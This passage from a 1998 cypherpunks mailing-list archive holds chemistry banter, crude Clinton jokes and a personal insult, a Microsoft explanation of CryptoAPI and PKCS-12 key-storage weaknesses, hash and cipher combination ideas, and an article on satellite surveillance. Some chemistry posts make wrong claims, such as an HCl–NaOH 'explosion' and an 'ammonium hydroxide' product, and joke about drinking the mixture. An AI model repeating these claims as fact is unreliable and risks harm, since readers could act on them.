a8Ov/LKuFJslK8osLKawD+38nnY9Y3K4kvgnIT2EPRRrEzu2MxO7CKb2J/ly4QVZ
xPbQ357GlmnCWmHvgECY7A20iPjgAO/z+8t9OEkCPv47E6C9+yzPdUXtWZ6Uwp4h
uy/7Dm5eCkA=
=nH/J
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Wed, 28 Jan 1998 15:18:52 +0800
To: "Paul H. Merrill" <paulmerrill@acm.org>
Subject: Re: State of the Union Address
In-Reply-To: <34CE676C.2B10424F@acm.org>
Message-ID: <Pine.BSF.3.91.980127113443.14544C-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain





On Tue, 27 Jan 1998, Paul H. Merrill wrote:

> Rabid Wombat wrote:
> > 
> > On Sat, 24 Jan 1998, Matthew Ghio wrote:
> > 
> > > Anonymous wrote:
> > >
> > > > [1] Grab a totally random sample of 100 high school students. Haul the
> > > >     students out one at a time and ask them the following questions:
> > > [snip]
> > > > 11) Michelle mixes one gram of HCl and one half gram of NaOH. Under normal
> > > >     circumstances, what is produced and in what quantities?
> > > >
> > >
> > > The correct answer is an explosion and a big mess.  One student in my high
> > > school chemistry class learned this the hard way.  :)
> > >
> > >
> > 
> > Um, salt water explodes?
> 
> I guess those high school students aren't the only ones with no clear
> idea of the way the world works.  While salt water does not ordinarily
> explode, in this case salt water is the ultimate product -- but massive
> heat released when acids and bases join and recombine to produce salts
> (in this case table salt) and water.
> 
> while some do feel (especially on this list) that the ends justify the
> means -- this is one means that definitely does not go along with that
> "rule".
> 
> PHM.
> 

Actually the qustion is probably hosed, as the ratio should be 1:1
Hcl:NaOH mol, not weight (which would be about 10:9 Hcl:NaOH or so if I'm
not confused here) ...  the idea being that if you calculate and measure
just right, you can mix too highly dangerous chemicals and will get
saltwater which you can drink. If you don't measure just right, and drink
it, you are rightly fucked, so don't try this at home. 

Can't find exact delta-h listed for NaOH, but rough guess on this reaction
is maybe 150,000 - 175,000 joules, or about half a box of kitchen matches
worth of heat (~150-175 btu ?), which wouldn't boil a quart of water. I
suppose if you had a small enough solution you could get a small "bang"
out of vaporizing the water. Not exactly a terrorist threat.

A moderate amount of heat, but without increasing the number of 
molecules, where's the explosion? Am I missing something? Looks like warm 
saltwater to me. OTOH, I don't know anything about chemistry 'cuz I 
always got kicked outa class for doing dumber things than mixing Hcl and 
NaOH and drinking it, which is the usual stunt. Don't try this at home, 
and don't take chemistry advice from marsupials.

btw - didn't really "do the math" on this, and it's 2am, so it could be 
wildly innacurate.

-r.w.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Wed, 28 Jan 1998 15:26:21 +0800
To: "Paul H. Merrill" <cypherpunks@cyberpass.net
Subject: Re: State of the Union Address
In-Reply-To: <Pine.BSF.3.91.980127113443.14544C-100000@mcfeely.bsfs.org>
Message-ID: <Pine.BSF.3.91.980127120727.14544E-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain





On Tue, 27 Jan 1998, Rabid Wombat wrote:

> 
> 
> On Tue, 27 Jan 1998, Paul H. Merrill wrote:
> 
> > Rabid Wombat wrote:
> > > 
> > > On Sat, 24 Jan 1998, Matthew Ghio wrote:
> > > 
> > > > Anonymous wrote:
> > > >
> > > > > [1] Grab a totally random sample of 100 high school students. Haul the
> > > > >     students out one at a time and ask them the following questions:
> > > > [snip]
> > > > > 11) Michelle mixes one gram of HCl and one half gram of NaOH. Under normal
> > > > >     circumstances, what is produced and in what quantities?
> > > > >
> > > >
> > > > The correct answer is an explosion and a big mess.  One student in my high
> > > > school chemistry class learned this the hard way.  :)
> > > >
> > > >
> > > 
> > > Um, salt water explodes?
> > 
> > I guess those high school students aren't the only ones with no clear
> > idea of the way the world works.  While salt water does not ordinarily
> > explode, in this case salt water is the ultimate product -- but massive
> > heat released when acids and bases join and recombine to produce salts
> > (in this case table salt) and water.
> > 
> > while some do feel (especially on this list) that the ends justify the
> > means -- this is one means that definitely does not go along with that
> > "rule".
> > 
> > PHM.
> > 
> 
> Actually the qustion is probably hosed, as the ratio should be 1:1
> Hcl:NaOH mol, not weight (which would be about 10:9 Hcl:NaOH or so if I'm
> not confused here) ...  the idea being that if you calculate and measure
> just right, you can mix too highly dangerous chemicals and will get
> saltwater which you can drink. If you don't measure just right, and drink
> it, you are rightly fucked, so don't try this at home. 
> 
> Can't find exact delta-h listed for NaOH, but rough guess on this reaction
> is maybe 150,000 - 175,000 joules, or about half a box of kitchen matches
> worth of heat (~150-175 btu ?), which wouldn't boil a quart of water. I
> suppose if you had a small enough solution you could get a small "bang"
> out of vaporizing the water. Not exactly a terrorist threat.
> 
> A moderate amount of heat, but without increasing the number of 
> molecules, where's the explosion? Am I missing something? Looks like warm 
> saltwater to me. OTOH, I don't know anything about chemistry 'cuz I 
> always got kicked outa class for doing dumber things than mixing Hcl and 
> NaOH and drinking it, which is the usual stunt. Don't try this at home, 
> and don't take chemistry advice from marsupials.
> 
> btw - didn't really "do the math" on this, and it's 2am, so it could be 
> wildly innacurate.
> 
> -r.w.
> 
> 

Ooops, 178,000 joules w/ 1 mol each (about 36 grams Hcl & 40 grams NaOH), 
so the "one gram each" example (wrong unit of measure, btw), assuming 
about 1/40 the quantity, would be about 4450 joules, or about five 
kitchen matches. bfd. OTOH, IANAC(hemist).

Looks like the answer to the original question would be "somewhat salty 
ammonium hydroxide", with the given quantities. Don't drink (drano) and 
drive.

-r.w.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 28 Jan 1998 03:11:40 +0800
To: cypherpunks@toad.com
Subject: RE: Latest Clinton dodge?
In-Reply-To: <3.0.5.32.19980127090723.008012c0@206.40.207.40>
Message-ID: <6V0yJe1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain



David Honig <honig@otc.net> writes:

> At 07:11 PM 1/26/98 EST, you wrote:
> >"Roger J Jones" <cyber@ibpinc.com> writes:
> >
> >> 
> >> Thanks for the info - while I am at it - has anyone ever disclosed the
> >> "distinguishing characteristic" that Paula Jones claims will prove its
> Bubba
> >> Bill?
> >> 
> >Can you spell "curvature"?
> 
> So you *do* have intimate knowledge of the president....
> but I won't tell :-)

What is the difference between Bill Clinton and the Titanic?
Only 1700 people went down on the Titanic.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Tue, 27 Jan 1998 20:29:52 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Latest Clinton dodge?
In-Reply-To: <cPVXJe1w165w@bwalk.dm.com>
Message-ID: <199801271220.NAA29561@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Dr.Dimitri Vulis KOTM, Noted Penis Expert, wrote:
>
> "Roger J Jones" <cyber@ibpinc.com> writes:
> >
> > Thanks for the info - while I am at it - has anyone ever disclosed
the
> > "distinguishing characteristic" that Paula Jones claims will prove
its Bubba
> > Bill?
> >
> Can you spell "curvature"?

It figures that Dimitri would know this. He seems to know all
about Tim's and Sameer's and John Gilmore's penises too. Must be
all that extensive taste-testing...

 - Frondeur

-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQA/AwUBNM3QsFqnO6WRZ1UEEQIrVACfbPo6boIC96jtFuuZaqYGcAjYmOAAn1+W
yk5WfpYk31L3iqqbkwXiN+hE
=ElxL
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@sundernet.com>
Date: Wed, 28 Jan 1998 02:56:58 +0800
To: cypherpunks <cypherpunks@toad.com
Subject: Information on key handling with Microsoft products (fwd)
Message-ID: <Pine.SUN.3.96.980127135417.15074B-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain




> There's been some discussion recently on this news alias about how
> Microsoft
> handles key management (and some related topics) in CryptoAPI (more
> specifically, the Microsoft base CSPs). Below is a document we've put
> together to help answer these questions.
>
> Thanks,
> -JasonG
>
> Product Manager, Windows NT Security
> Microsoft Corporation
>
>
>
> Microsoft's Response to Recent Questions on the Recovery
> of Private Keys from various Microsoft Products
>
> Recently, there has been discussion on some Internet forums about the
> methods Microsoft uses to store private keys in some of its products, as
> well as about CryptoAPI's role in key management. These discussions
> included
> some inaccurate information about the PFX and PKCS-12 formats, as well as
> how Microsoft implements these formats in its products.
>
> This paper was prepared by the Microsoft Public Key Infrastructure team to
> provide some additional insight and clarification on these issues, and in
> some cases, identify long-term plans that Microsoft has to continue the
> improvement of security in our products.
>
> CryptoAPI
> One area to clarify at the outset is the role of CryptoAPI. Implications
> that any key management problem on Microsoft's Internet products would be
> an
> example of fundamental problems with CryptoAPI are absolutely inaccurate.
> CryptoAPI is a set of cryptographic technologies that are provided for use
> by other software--sort of a cryptographic toolbox. The actual
> cryptographic
> functions are provided through Cryptographic Service Providers (CSPs),
> which
> are implemented as DLLs. With the exception of the details about a
> possible
> PKCS-12 attack, all the issues raised in the recent discussions are
> specifically aimed at Microsoft's base CSPs, not at CryptoAPI.  The base
> CSPs are the royalty-free, software-based CSPs provided with Windows NT
> 4.0,
> Windows 95, and Internet Explorer. These attacks do not apply in general
> to
> other CryptoAPI CSPs and do not indicate any fundamental concerns with the
> security of the CryptoAPI architecture or applications built upon it.
>
> PFX/PKCS-12
> Microsoft products do not "store" private key material using PKCS-12,
> contrary to recent descriptions on the Internet. For clarification,
> PKCS-12
> is a standard format, used for export/import of Public Key Certificates
> and
> related key material.  At present, the only Microsoft product that
> supports
> use of this format is Microsoft Internet Explorer 4.x.  Internet Explorer
> uses PKCS-12 solely as a means of migrating  a user's Certificate and
> public-private key pair between multiple Internet Explorer installations
> or
> between Internet Explorer and other products, such as Netscape
> Communicator.
>
>
> Some background might help. Microsoft originally developed the draft
> specification for an encrypted export/import format, referred to as PFX,
> but
> the PFX specification was never implemented by Microsoft.  Instead, the
> PFX
> specification was handed over to RSA Labs and it became the draft PKCS-12
> specification.  The design was then reviewed, and contributed to, by a
> number of other companies to arrive at the current PKCS-12 standard.
> Microsoft and Netscape have both implemented PKCS-12 with 40-bit
> encryption.
> This was done to provide a common, exportable solution that was completely
> interoperable.
>
> The example of breaking a PKCS-12 data blob, which was given in discussion
> on the Internet, is not an attack on the "weak" cryptography of PKCS-12.
> Rather, it is simply a dictionary attack (long known and well understood
> in
> cryptography), which works well if people use poorly-chosen passwords to
> protect the PKCS-12 data blob. Examples of such bad passwords include
> words
> in the English dictionary.  In our implementation of PKCS-12, we could
> possibly do some things to make brute-force attack against an exported
> PKCS-12 data blob more difficult. For example, performing a dictionary
> check
> on the password before accepting it for encrypting the data blob would
> reduce the use of weak passwords. Alternatively, we could  iterate the
> setup
> function to increase "diversity" making it much more expensive for an
> attacker to search. However, neither of these methods are required for
> protection of the data blob. Good security is always a combination of
> technology and policy. As part of a strong security policy, strong
> passwords
> should be used on all resources. The Microsoft Security Advisor website
> (http://www.microsoft.com/security) has some guidelines for choosing
> strong
> passwords.
>
> One statement by the original poster argues that Microsoft managed to
> design
> a security format that actually makes it easier to break into the
> protected
> data. As stated above, a number of well respected companies were involved
> extensively in the design and review of PKCS-12 before it became a
> standard.
> An iteration count, which would make the type of attack described above
> more
> difficult (in terms of time), was added late in the PKCS-12 evolution.  It
> was, however, too late to make it into the Internet Explorer 4 product
> release. Future versions of Internet Explorer will include support for the
> an iteration count, further strengthening the security of exported key
> material.
>
> Of course, in general the PKCS-12 data objects will not be available on a
> user's machine, since they are only used by Internet Explorer 4.x when
> exporting key material to, or importing key material from another system.
> As
> with any sensitive data, users should take care when working PKCS-12 data
> blobs and not leave them on their hard drives.
>
> Exploiting Internet Explorer
> One of the fundamental requirements to perform any possible cryptographic
> attack discussed in the recent postings is the assumption that a malicious
> entity could somehow access to data on a user's computer system, without
> the
> permission or knowledge of the user.  This is a large leap of faith.
> Users
> that are using Public Key Certificates today are generally sophisticated
> and
> savvy users, or part of a larger corporate infrastructure with
> knowledgeable
> administrators. This class of users will certainly keep abreast of current
> security issues and install security-related patches and updates as they
> become available. Microsoft has been extremely responsive in dealing with
> all known Internet Explorer security attacks and has posted patches for
> all
> currently known attacks. And, of course, security issues are certainly not
> limited to Microsoft software.
>
> Information on security-related issues with Microsoft products is
> available
> on the Microsoft Security Advisor website at
> http://www.microsoft.com/security.
>
> Attacks against Authenticode signing keys
> Another concern identified was that if a malicious hacker could steal a
> user's or company's Authenticode signing key, that hacker could sign
> objects
> with that key and distribute them. Then when other users tried to download
> the signed object, they would think the key's owner really signed the
> object, which might contain malicious code. The Authenticode program has
> been designed to ensure that only trusted programs are allowed to run on a
> users machine. As stated earlier Microsoft has been very responsive is
> addressing security issues with IE.
>
> However, it is extremely unlikely anyone could be successful with a
> simplistic strategy for stealing Authenticode signing keys and then using
> them.  As noted above, there are security patches already released for
> known
> Internet Explorer bugs that could possibly allow a key blob to be stolen
> off
> a user's hard disk (assuming a user left an Authenticode 'key' file on
> their
> hard disk).   Second, anyone signing code using Authenticode technology is
> extremely unlikely to leave their key material sitting on an end user
> machine routinely used for browsing the Internet.
>
> Microsoft recommends storing key material, such as that used in
> Authenticode, in hardware tokens. Such tokens prevent any of these attacks
> from getting started as the keys are not stored in the PC and are not
> exportable.  The Authenticode signing keys that Microsoft uses for all our
> software, for instance, are stored in such a physical hardware key storage
> mechanism.
>
> Attacks on Encrypted Key material
> There is some confusion over the algorithms and methods that Microsoft
> uses
> to provide protection of encrypted key material in Internet Explorer when
> using the standard Microsoft base CSPs. There were changes between
> Internet
> Explorer 3.0x and Internet Explorer 4.x specifically to address any
> possible
> concern. Note, this concern is unlikely to be valid for any third-party
> software CSP and is not relevant to hardware CSPs.
>
> Microsoft is constantly working to improve the security of our products.
> We
> determined that there were better suited methods for storing keys than
> using
> the RSA RC4 stream cipher algorithm used in Internet Explorer 3.0x.  In
> particular, a stream cipher, such as RC4, is not ideally suited for this
> particular use because it can be susceptible to a "known-keystream
> attack".
> In a known-keystream attack, if you know the plain text, which you
> arguably
> might be able to determine given the number of standard PKCS-8 fields, you
> can recover the keystream.  If you recover the keystream, then a XOR
> function will indeed decrypt anything else encrypted with the same key.
> However, Microsoft only used this RC4-based implementation in the base
> CSPs
> that shipped with Internet Explorer 3.0x.  The CSPs that shipped in
> Internet
> Explorer 4.x protect private key material in a form that is encrypted
> using
> DES, which is a block cipher and is not susceptible to the known-keystream
> attack that can be used against RC4.
>
> Again, note that this kind of attack assumes some degree of security
> breach
> on the user's system such that the keystream could be obtained.
>
> Key export attacks
> The original Internet posting raises concern about the CryptoAPI interface
> CryptExportKey().  This function is fully documented and does indeed
> export
> private key material in an encrypted format.  The presence of the
> CryptExportKey() function is to support functionality such as migrating
> key
> material between machines for a user or creating a backup copy of a key.
> It
> should be noted however, that many CSPs, including most hardware based
> CSPs,
> do not allow exportable private keys and will return and error in response
> to a CryptExportKey() request.
>
> Also, Microsoft's base software CSPs provide a means to mark keys as
> non-exportable when they are generated.  An additional security protection
> is provided if the flag CRYPT_USER_PROTECTED is set, in which case each
> use
> of the private key, including export, requires the user to supply a
> password
> to access the key.  Some commercial CAs are not currently setting this
> flag
> and do not provide the user a way to request it during Certificate
> enrollment.  We recognize this as a problem.  We will continue working
> with
> CAs to assist them in supporting these security features.  However, we
> will
> also make available a utility to allow setting this flag after key
> generation for users concerned with this type of attack.
>
> The posting also asserts that an ActiveX control could be downloaded from
> a
> web page, simply ask for the current users key, ship the key off for
> collection by an unscrupulous person, and then delete itself without a
> trace.
>
> If users run unsigned code, or code from an unknown origin, a number of
> unpleasant things can happen.  This could indeed occur if the key as been
> marked exportable and the CRYPT_USER_PROTECTED flag is not set. However,
> such a scenario assumes that the user follows few or no policies with
> regard
> to good security, such as running code from unknown sources. Similarly, if
> the user were running software from unknown/untrusted sources, that
> software
> could reformat their hard drive, or manipulate other user data. This
> concept
> is certainly not new.
>
> There was also discussion of 16 dialog boxes appearing to the user for
> their
> password if the CRYPT_USER_PROTECTED flag is set. Certainly asking the
> user
> too many times would be better than too few times, however in our tests,
> under extreme (and uncommon cases), a user might be asked for their
> password
> at most four times when a key is used with the Microsoft base CSPs.
> Perhaps
> the claim came from an early beta release.
>
> ----------------------------------------------------------------
> Users Guide http://www.microsoft.com/sitebuilder/resource/mailfaq.asp
> contains important info including how to unsubscribe.  Save time, search
> the archives at http://microsoft.ease.lsoft.com/archives/index.html





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@sundernet.com>
Date: Wed, 28 Jan 1998 02:57:57 +0800
To: cypherpunks <cypherpunks@toad.com
Subject: Sweedish police weed out hackers
Message-ID: <Pine.SUN.3.96.980127135529.15074C-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain




---------- Forwarded message ----------
Date: Mon, 26 Jan 1998 14:05:57 -0500
From: Salvatore DeNaro <Salvatore_DeNaro@usccmail.lehman.com>
To: Ray Arachelian <sunder@brainlink.com>
Subject: Forward this to the list?

*** Swedish police weed out hackers

2 young Swedish hackers who turned a Swedish county's home page into
an advertisement for pornography and marijuana and broke into the
U.S. space agency's computer system have been tracked down, local
media reported. After a yearlong hunt, police in Umea in northern
Sweden finally traced the 2 youths, aged 18 and 15, and seized their
computers, the newspaper Vasterbottens Folkblad said Wednesday.
Police were quoted as saying no charges would be laid because no
economic crime had been committed. See
http://www.infobeat.com/stories/cgi/story.cgi?id=7065918-55d





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@sundernet.com>
Date: Wed, 28 Jan 1998 03:01:46 +0800
To: Declan McCullagh <declan@well.com>
Subject: Re: Latest Clinton dodge?
In-Reply-To: <v03007804b0f27e3096cb@[168.161.105.216]>
Message-ID: <Pine.SUN.3.96.980127135805.15074D-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, 26 Jan 1998, Declan McCullagh wrote:

> 
> Clinton said this morning:
> 
> >>>>
>  I want you to listen to me.  I'm
> going to say this again.  I did not have sexual relations with that
> woman, Miss Lewinsky.  I never told anybody to lie, not a single time
> -- never.  These allegations are false.
> <<<<
> 
> The question then becomes, of course, what does "sexual relations" mean?
> 
> Is it oral sex?


Next thing you know, he'll say "She gave me a blow job, but didn't
swallow, so it's not sex." :)

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder@sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John Kelsey" <kelsey@plnet.net>
Date: Wed, 28 Jan 1998 06:57:59 +0800
To: "Adam Back" <aba@dcs.ex.ac.uk>
Subject: future proofing algorithms
Message-ID: <199801272251.QAA01965@email.plnet.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

[ To: Cypherpunks, Adam Back ## Date: 01/26/98 ##
  Subject: future proofing algorithms ]

>Date: Mon, 26 Jan 1998 01:18:31 GMT
>From: Adam Back <aba@dcs.ex.ac.uk>
>Subject: future proofing algorihtms (Re: (eternity) Eternity
>         as a secure filesystem/backup medium)

>It is interesting to note that Tim May's recent suggestion
>of LAM (Local Area Mixes) would help here because if 5 of
>those mixmaster nodes where part of a LAM, it is unlikely
>that the NSA would be able to archive inter remailer
>traffic, thus increasing effective pool size to 100^5.  So
>one advantage of the LAM approach is that it provides links
>which are protected by physical security.

This is a good point.  The crypto looks like the strongest
link in the chain right now, but if it turns out not to be,
reliance on local physical security isn't a bad idea.
(This works only if the huge numbers of the local machines
must be subverted for an attack to work; if the attacker has
to take over only a couple machines, he can probably manage
this.)  Discovering a better way to bypass my physical
security today doesn't let you know who sent what last year,
and security guards don't become retroactively twice as
cheap to bribe every eighteen months.

>> Note that, in practice, this isn't likely to be useful
>> unless you've done the same kind of thing for symmetric key
>> distribution, random number generation, etc.  Otherwise,
>> your attacker in 2050 will bypass the symmetric encryption
>> entirely and factor your RSA modulus, or guess all the
>> entropy sources used for your PRNG, or whatever else you can
>> think of.

>Yes.  We need to build constructs for all areas.  A mega
>hash would be nice, with a large output size even in the
>face of birthday attack, preferably as secure as a
>collection of hash functions.

Right.  I've seen some work done on this, mostly informally.
The basic result I'm aware of with hash functions is like
this:  Let f() and g() be two different hash functions,
such as SHA1 and RIPE-MD160.  Let X,Y be the concatenation
of X and Y.  Then:

Hash1(X) = f(X),g(X)
Hash2(X) = f(g(X)),g(f(X))

You can quickly convince yourself that Hash1(X) is at least
as resistant to collision as the stronger of f() and g(),
but it's only as resistant as the weaker of the two to
leaking information about X.  (That is, if f(X) just gives
you the low 160 bits of X, then Hash1(X) gives you the same
thing.)  Hash2() won't leak information unless both f()
and g() leak information about their inputs, but you can't
guarantee that it will be very good against collisions.
(That is, if f(X) = 0 for all X, then all possible X values
cause a collision in Hash2(X).)

If f() and g() are independent, and one of them
looks like a random function of X, then

Hash3(X) = f(X) XOR g(X)

looks pretty good.  But it's possible for either f() or g()
to be non-reversible without Hash3() being nonreversible.
(The obvious case occurs when you think of something like

f(X) = X
g(X) = encrypt_{knownKey}(X) XOR X.

Note that g() looks rather like some existing hash
functions, where encrypt() is a known function.

>That gives us something to wash our pseudo random number
>input entropy with, and then we can go on to combine public
>key systems.

Right.  Choosing the PRNG well is important, but I suspect
that the real issue is going to be getting enough input
entropy.  If you can get 80 bits of real entropy today, you
have a reasonably secure system now, but NSA may not find
your system that secure in twenty years.

For resistance to cryptanalysis, we can use the same set of
stream ciphers as before.  If we run Blowfish, 3DES, and
SAFER-SK128 in OFB-mode, and XOR the streams together, we
get an output stream that's no easier to predict than the
weakest of the three ciphers used.

Entropy collection on a wide range of different machines,
without specialized hardware, is just a hard thing to do
well.  It's especially hard if you're postulating a
massively powerful attacker years in the future.

>A problem with public key systems however is that there
>isn't a lot of choice -- basically all based on discrete log
>or factoring.  So perhaps RSA and DH combined in a construct
>with an optimistically proportioned key size would be near
>all that could be done.

That sounds about right.  Note that LAMs and such can use
shared symmetric keys along with the public keys, so that an
attacker has to get both to defeat the system.  When the
number of mixes is small, maybe some informal
password-sharing at conferences might help this.  For LAMs,
some level of hand-carried key exchange can be used.  Then,
actual keys can be encrypted as

RSA(R_0), ElGamal(R_1) are sent
Previously shared secret key K_2 is known.
Session Key = SK = E_{K_2}(R_0) XOR E_{K_2}(R_2).

Also note that DH should probably be used with many
different prime moduli, to resist any massive precomputation
on one modulus.  Maybe each mix could have several
expensively-prepared Sophie Germaine primes, and senders
could randomly select one for DH or El Gamal encryption.
This would spread out a future attacker's resources, though
of course, the attacker's effort scales only linearly in the
number of (expensive to find) primes.

>I suspect archiving world Network traffic would pose
>something of a operational and financial strain :-)

On the other hand, perhaps this is how NSA will pay their
employees' salaries once crypto becomes sufficiently
widespread:  They will start a search engine service on all
those archives of usenet/internet traffic for all these
years:  ``Check up on your political opponents' newsreading
habits.  Read the love letters of libertarian activists in
the 90s.  Find out whether Chief Justice Clarence Thomas
ever visits adult web sites these days.  *Only* at
http://www.archives.nsa.org ''

It would actually be very funny if historians in a couple
centuries got access to the NSA's archives of recorded phone
calls, telegrams, and e-mails.  Imagine the odd assumptions
that would result, with history students having this image
of twentieth century america based on recorded phone calls
of anarchists, antiwar activists, civil rights activists,
communists, important politicians, mobsters, suspected
spies, and wealthy businessmen.

>Adam

Note:  I read CP-LITE instead of the whole list.  Please CC
       me on replies.

- --John Kelsey, kelsey@counterpane.com / kelsey@plnet.net
NEW PGP print =  5D91 6F57 2646 83F9 6D7F 9C87 886D 88AF

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBNM5efSZv+/Ry/LrBAQGN8wP/aHKJbm024oDMNZIozcBGW+Vt4bKKLDoZ
xhV6DQ3e4v9UadYJeKpCfRjrMDC06H6eP3D4E8vizEHVk2JCvHDTN3Fshf5pOtB2
tgrooYOP1pC5FuQAPPyhkJ840V7ve0mlpy3VWz5/hSvkkP1BW7KHoFv47sniVHZe
RFsiz/hW7jc=
=2Oml
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul H. Merrill" <paulmerrill@acm.org>
Date: Wed, 28 Jan 1998 04:14:50 +0800
To: Rabid Wombat <wombat@mcfeely.bsfs.org>
Subject: Re: State of the Union Address
In-Reply-To: <Pine.BSF.3.91.980126093631.12571B-100000@mcfeely.bsfs.org>
Message-ID: <34CE676C.2B10424F@acm.org>
MIME-Version: 1.0
Content-Type: text/plain



Rabid Wombat wrote:
> 
> On Sat, 24 Jan 1998, Matthew Ghio wrote:
> 
> > Anonymous wrote:
> >
> > > [1] Grab a totally random sample of 100 high school students. Haul the
> > >     students out one at a time and ask them the following questions:
> > [snip]
> > > 11) Michelle mixes one gram of HCl and one half gram of NaOH. Under normal
> > >     circumstances, what is produced and in what quantities?
> > >
> >
> > The correct answer is an explosion and a big mess.  One student in my high
> > school chemistry class learned this the hard way.  :)
> >
> >
> 
> Um, salt water explodes?

I guess those high school students aren't the only ones with no clear
idea of the way the world works.  While salt water does not ordinarily
explode, in this case salt water is the ultimate product -- but massive
heat released when acids and bases join and recombine to produce salts
(in this case table salt) and water.

while some do feel (especially on this list) that the ends justify the
means -- this is one means that definitely does not go along with that
"rule".

PHM.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 28 Jan 1998 04:18:00 +0800
To: cypherpunks@cyberpass.net
Subject: sat survailience
Message-ID: <v04003903b0f3edd475f7@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Date: Tue, 27 Jan 1998 14:55:09 -0500
From: Somebody
Subject: sat survailience
To: rah <rah@shipwright.com>
MIME-version: 1.0

Bob - something else to be paranoid about!
<somebody's .sig>
<snip>

When Is a Satellite Photo An Unreasonable Search?

By <some reporter>
Staff Reporter of <A big newspaper>

Over the years, satellite photos have plotted the course of Soviet warships
and tracked the movements of Iraqi troops.


Last year, they also nailed Floyd Dunn for growing cotton on his Arizona
farm allegedly without an irrigation permit.

Mr. Dunn contends that he did have the required permits but paid the $4,000
fine to maintain good relations with the Arizona Department of Water
Resources. "You can't argue with a satellite," he says. "Being caught like
I was caught is kind of unfair."

As state and local agencies make more use of satellite imagery -- for
everything from surveying illicit crops to detecting unauthorized building
-- they're raising questions about the propriety of spying on American
civilians from the sky.

"It certainly has a 'Big Brother Is Watching You' flavor to it," says Larry
Griggers, a director at the Georgia Department of Revenue. "But it prevents
us from having to spend money for other types of enforcement." The state
tax authority plans to use National Aeronautic and Space Administration
satellites to check all 58,910 squares miles of the state for unreported
timber cutting. It also plans to share the photos with any state agency
that asks, which could lead to a wide variety of enforcement actions.

Does taking satellite photos of private citizens and their property --
generally without their knowledge -- violate the Constitution's Fourth
Amendment protections against unreasonable searches? The American Bar
Association has organized a task force to explore that question, as well as
such issues as how long photos can be kept on file and how freely they can
be shared with police. Because U.S. Justice Department officials are on the
task force, the recommendations are expected to influence how
law-enforcement authorities and civil agencies use the new images and at
what point they require warrants.

Use of satellite images has increased markedly since the early 1990s, when
the Russian space agency, Sovinformsputnik, began selling spy-quality
photos to raise cash. The U.S. lifted its own restrictions on sale of
high-resolution satellite photos in 1994, which encouraged entrepreneurs to
launch satellites of their own that could compete with the Russian imagery.

Those efforts may soon pay off. This year a joint venture of Lockheed
Martin Corp. and Raytheon Co. hopes to launch a satellite that will yield
imagery detailed enough to distinguish sedans from minivans. Another firm,
Earthwatch Inc. of Longmont, Colo., says it is proceeding with plans to
launch a similar satellite in 1999 -- despite the recent loss of radio
contact with a less-advanced model the firm launched in December. Both
enterprises decline to discuss their public-sector clients.

Some state and local agencies have been purchasing photos from French,
Indian and U.S. government satellites since the 1980s, and increasingly
powerful computer software is allowing them to make better use of the
imagery.

The Arizona Department of Water Resources spotted Mr. Dunn's cotton crop,
for example, because it routinely obtains photographs from the French
government's SPOT satellites of 750,000 acres of central Arizona farmland.
State officials then compare the images with a database of water-use
permits to determine which farmers might be exceeding water-use rules.

"A week doesn't go by where somebody doesn't propose a new use," says John
Hoffman, whose Raleigh, N.C., business, Aerial Images Inc., has become the
main reseller of images taken by Russian intelligence satellites.

Much of what Mr. Hoffman has available is old imagery of Western cities.
But he says he can also take orders for new photos on upcoming missions.
Price: $6,500 to photograph 10 square kilometers with resolution of about
six feet, which he says is sharp enough to distinguish cars from pickup
trucks.

In North Carolina several counties are using Mr. Hoffman's photos to find
unreported building activities, agricultural development and other property
improvements that would raise property-tax assessments. Demand from state
and local agencies in his region is so strong, he says, that
Sovinformsputnik, the Russian space agency, has scheduled a Feb. 17 launch
of a satellite that will concentrate mainly on photographing the
Southeastern U.S.

Pictures taken from airplanes at lower altitudes are often more revealing,
but satellite imagery can be much more cost-effective. Photographing an
area the size of a small town, for example, can cost tens of thousands of
dollars by airplane, approximately twice the cost by satellite. Some
satellite imagery is faster as well. Although the satellites Mr. Hoffman
works with use conventional film that is developed after the satellite
returns to earth, newer camera platforms can transmit images digitally just
